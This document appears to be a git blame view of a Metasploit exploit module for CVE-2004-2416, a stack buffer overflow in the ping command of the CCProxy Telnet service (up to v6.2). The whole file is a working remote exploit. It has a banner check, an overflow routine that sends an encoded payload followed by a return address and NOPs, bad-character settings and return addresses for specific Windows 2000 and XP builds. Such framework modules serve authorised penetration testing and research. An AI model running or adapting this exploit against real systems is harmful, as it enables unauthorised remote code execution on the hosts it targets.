Files
metasploit-gs/modules/exploits/windows/proxy/ccproxy_telnet_ping.rb
T

Ignoring revisions in .git-blame-ignore-revs. Click here to bypass and see the normal blame view.

78 lines
2.2 KiB
Ruby
Raw Normal View History

2007-09-09 22:39:55 +00:00
##
2017-07-24 06:26:21 -07:00
# This module requires Metasploit: https://metasploit.com/download
2013-10-15 13:50:46 -05:00
# Current source: https://github.com/rapid7/metasploit-framework
2007-09-09 22:39:55 +00:00
##
2016-03-08 14:02:44 +01:00
class MetasploitModule < Msf::Exploit::Remote
2009-12-06 05:50:37 +00:00
Rank = AverageRanking
2010-02-15 00:48:03 +00:00
include Msf::Exploit::Remote::Tcp
2007-09-09 22:39:55 +00:00
2010-02-15 00:48:03 +00:00
def initialize(info = {})
super(update_info(info,
2014-03-11 12:44:34 -05:00
'Name' => 'CCProxy Telnet Proxy Ping Overflow',
2007-09-09 22:39:55 +00:00
'Description' => %q{
This module exploits the YoungZSoft CCProxy <= v6.2 suite
Telnet service. The stack is overwritten when sending an overly
long address to the 'ping' command.
2007-09-09 22:39:55 +00:00
},
2017-11-09 03:00:24 +11:00
'Author' => [ 'aushack' ],
2010-02-15 00:48:03 +00:00
'Arch' => [ ARCH_X86 ],
2007-09-09 22:39:55 +00:00
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2004-2416' ],
[ 'OSVDB', '11593' ],
[ 'BID', '11666' ],
2012-06-28 14:27:12 -05:00
[ 'EDB', '621' ],
],
2007-09-09 22:39:55 +00:00
'Privileged' => false,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
2007-09-09 22:39:55 +00:00
'Payload' =>
2010-02-15 00:48:03 +00:00
{
2007-09-09 22:39:55 +00:00
'Space' => 1012,
'BadChars' => "\x00\x07\x08\x0a\x0d\x20",
},
'Platform' => ['win'],
'Targets' =>
[
# Patrick - Tested OK 2007/08/19. W2K SP0, W2KSP4, XP SP0, XP SP2 EN.
[ 'Windows 2000 Pro All - English', { 'Ret' => 0x75023411 } ], # call esi ws2help.dll
[ 'Windows 2000 Pro All - Italian', { 'Ret' => 0x74fd2b81 } ], # call esi ws2help.dll
[ 'Windows 2000 Pro All - French', { 'Ret' => 0x74fa2b22 } ], # call esi ws2help.dll
[ 'Windows XP SP0/1 - English', { 'Ret' => 0x71aa1a97 } ], # call esi ws2help.dll
[ 'Windows XP SP2 - English', { 'Ret' => 0x71aa1b22 } ], # call esi ws2help.dll
],
2020-10-02 17:38:06 +01:00
'DisclosureDate' => '2004-11-11'))
2010-02-15 00:48:03 +00:00
register_options(
2007-09-09 22:39:55 +00:00
[
Opt::RPORT(23),
])
2007-09-09 22:39:55 +00:00
end
2010-02-15 00:48:03 +00:00
def check
2007-09-09 22:39:55 +00:00
connect
banner = sock.get_once || ''
2007-09-09 22:39:55 +00:00
disconnect
if banner.to_s =~ /CCProxy Telnet Service Ready/
2014-01-20 14:26:10 -06:00
return Exploit::CheckCode::Detected
2007-09-09 22:39:55 +00:00
end
return Exploit::CheckCode::Safe
end
def exploit
connect
2010-02-15 00:48:03 +00:00
2007-09-09 22:39:55 +00:00
sploit = "p " + payload.encoded + [target['Ret']].pack('V') + make_nops(7)
sock.put(sploit + "\r\n")
handler
disconnect
end
2009-05-19 13:20:32 +00:00
end